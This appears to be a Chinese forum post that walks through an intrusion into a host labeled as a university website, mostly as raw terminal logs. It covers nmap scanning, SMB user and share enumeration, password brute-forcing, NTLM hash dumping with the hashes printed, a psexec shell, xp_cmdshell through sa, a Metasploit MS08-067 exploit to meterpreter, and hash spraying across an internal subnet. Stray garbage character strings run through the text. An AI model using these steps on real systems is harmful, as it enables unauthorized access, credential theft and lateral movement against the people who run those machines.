广西师范网站http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST

Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    //列出扫描脚本
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    //扫描结果

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
# f& t8 S' I4 s+ U3 l) G6 _! m; p( P; m2 L
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
//查看共享

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
w% K( X4 k4 J+ s
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
//获取用户密码

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    //抓hash
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data

root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
: s8 z7 P! b5 ]5 Y0 z$ M& w9 d: v# y% G
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    //获取一个cmdshell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    //远程登录sa执行命令
1 A& F6 U& c0 D9 O: l
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    //检测目标机器漏洞

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
, \! C7 Q% Q4 ^! X' X7 I/ H' g1 j, s9 i" ]
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
9 M( h/ C$ B% t$ \$ V
2 n% }( g/ i) N M* amsf > search ms08: W1 r. `4 U) f* }
( h8 v2 N. Z ^- ^+ }+ ?" Fmsf > use exploit/windows/smb/ms08_067_netapi
2 n$ t. x6 ^) R8 K0 c; P2 K
7 E2 R; P8 ?3 }0 |7 bmsf exploit(ms08_067_netapi) > show options
6 ^3 d- M8 Z/ s) r) S2 H! _1 l( ~) h& p5 y" `$ c
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
+ \9 k' C% e! B( Z" G/ k* a1 k2 Y& @4 a0 M* L
msf exploit(ms08_067_netapi) > show payloads
0 Z) ~$ P( w# ^) g8 a. C1 R. j3 y( p
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp4 V5 Z' X) T' l- w
) {. X7 c8 x: v6 E0 Wmsf exploit(ms08_067_netapi) > exploit* x5 l5 K- u- b" A; k. z
9 T3 y: _0 h' H, k+ _meterpreter >
- W9 o. G' {1 l7 M2 h
" r" }7 S- n5 |( t& XBackground session 2? [y/N] (ctrl+z)( y6 b; d( E+ w( r8 C( |0 M# @! B
" x) K" u/ |7 o2 k; i% r8 m; qmsf exploit(ms08_067_netapi) > sessions -l1 n/ c1 [1 a2 [& S, |
$ X- Z" N* Y7 d$ h9 o2 }8 `
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt0 x$ [9 C- S7 [' l! I1 `
1 l9 D+ n) x$ o9 y- E
test( R. k3 d: j; d
9 S5 `$ |; e# P7 Z8 n- X7 uadministrator; \! ~3 _% a8 z' K& X- q* B; j: u
" |1 R0 C! r* i# W( k
root@bt:/usr/local/share/nmap/scripts# vim password.txt3 ~. U; l5 K$ [& ]* `: p
! ?; s. M5 l: w+ t7 B44EFCE164AB921CAAAD3B435B51404EE6 e! K2 G& T2 g" i
, p9 T' \, e& ]4 U" Y( I7 Vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 5 v9 z1 O. J* w. F/ u- @4 o
P+ A$ g q, t; B- X g+ Q
//利用用户名跟获取的hash尝试对整段内网进行登录' x( l9 x# P/ u5 C
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
: h$ C3 H% p- G
攻击成功，一个简单的 msf + nmap 攻击。
1 U" C, c0 Q- g b
9 @( q |1 {& l# @! c& o. e |